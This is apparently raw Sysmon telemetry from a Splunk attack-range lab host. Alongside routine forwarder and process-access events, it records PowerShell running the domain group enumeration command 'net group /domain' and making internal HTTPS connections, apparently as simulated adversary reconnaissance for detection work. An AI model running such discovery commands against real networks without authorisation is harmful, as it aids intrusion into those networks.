AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA2B59C703C8978ABB480EDEA0026453,SHA256=B00F791153144AD0E086F1D6E1FE5B9C28C42673E4789572C9B56507CDD942E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:53.029{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A57B3C2B0D6FB23FC7A880C4EB6FAC,SHA256=B8B6D084842BAFD0DC0A1E105FB41296D6E11E0124A3491EB72B432F9A6F1832,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:54.509{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=65689B42D36691B676571BF5CEC79480,SHA256=019024A1F2F9CBCEAA5799989A6461AB5167FBD0DB1F6A5F3D611213D8DD6A8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:54.048{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0A1A7489D3E9C0586251925B509E58,SHA256=1316AF3357B02D410032AC44F0E6DC4C618F426880770D4A31AE1206613E58D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:19.661{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62126-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:55.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C9D0703B9A2BCBA56A53F39C228D62,SHA256=C0B8343AC75684C0C168C3BFB7B7E97BFEADA6E6214F9059842585A864ED3CCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:20.407{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62127-false10.0.1.12-8000- 23542300x800000000000000035128253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:56.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3414C612F3568D9E2BE92109E8AC1B12,SHA256=6E2C9EB7539299378EC3175756DD4533D0578F6DCF5C514E76854FF078BC4C2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:57.092{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E6AC340E51A2B47CDA4FE802FD874E3,SHA256=1039BD4E93AEE55C726AD4B15FDAD3DBCB417EE026B8C5CA0560006D0A16457D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:58.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3DE7A247CA72BEDD4A9BF09B6AA5A22F,SHA256=313ECEC67338DCE2131CF710A9E8BAC2AC6D13B23942786487CF6C9867245A68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:58.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AD4584BA214A6396CBE2693A47FC0E7,SHA256=378CD9F5BFACFB153AA8336FE6410CD4ADDC8169D5FEF01A8B391A9510E2F88B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:59.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=606B4FEC1EE614EA9CFA8E045AB00942,SHA256=62BDBD941EF49F611DE68E3FF57EF5C8C592F00D2B1079B153A7277790DABBA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:23.689{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62128-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:00.173{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE7802FD722FF97CD06525081D1D4C20,SHA256=DE9CCA0950A0B540766FF94B05B3465FDC2E5C6A061B10CA71B674D81C67C072,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:00.042{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.688{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.673{B81B27B7-4012-611D-0B00-00000000C801}6366436C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.673{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.673{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-4012-611D-1400-00000000C801}8841384C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8369-613A-CF96-03000000C801}1224C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-8369-613A-CF96-03000000C801}1224C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.557{B81B27B7-8369-613A-CE96-03000000C801}32721232C:\Windows\system32\net.exe{B81B27B7-8369-613A-CF96-03000000C801}1224C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\net.exe+240f|C:\Windows\system32\net.exe+1883|C:\Windows\system32\net.exe+163b|C:\Windows\system32\net.exe+1375|C:\Windows\system32\net.exe+26fd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.555{B81B27B7-8369-613A-CF96-03000000C801}1224C:\Windows\System32\net1.exe10.0.14393.0 (rs1_release.160715-1616)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet1.exeC:\Windows\system32\net1 group /domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=946383ED00F5CD92DBCB7CDB878ED819,SHA256=E92A2FA67AD2F7367ABA1ABF237D245B5E36291C5A4A9F0FC04B3A0E32FF618E,IMPHASH=E2F26A4CA577CF6DBACE937727934F80{B81B27B7-8369-613A-CE96-03000000C801}3272C:\Windows\System32\net.exe"C:\Windows\system32\net.exe" group /domain 10341000x800000000000000035128271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.541{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8369-613A-CE96-03000000C801}3272C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.541{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.541{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.541{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.541{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.541{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-8369-613A-CE96-03000000C801}3272C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:01.541{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-8369-613A-CE96-03000000C801}3272C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.303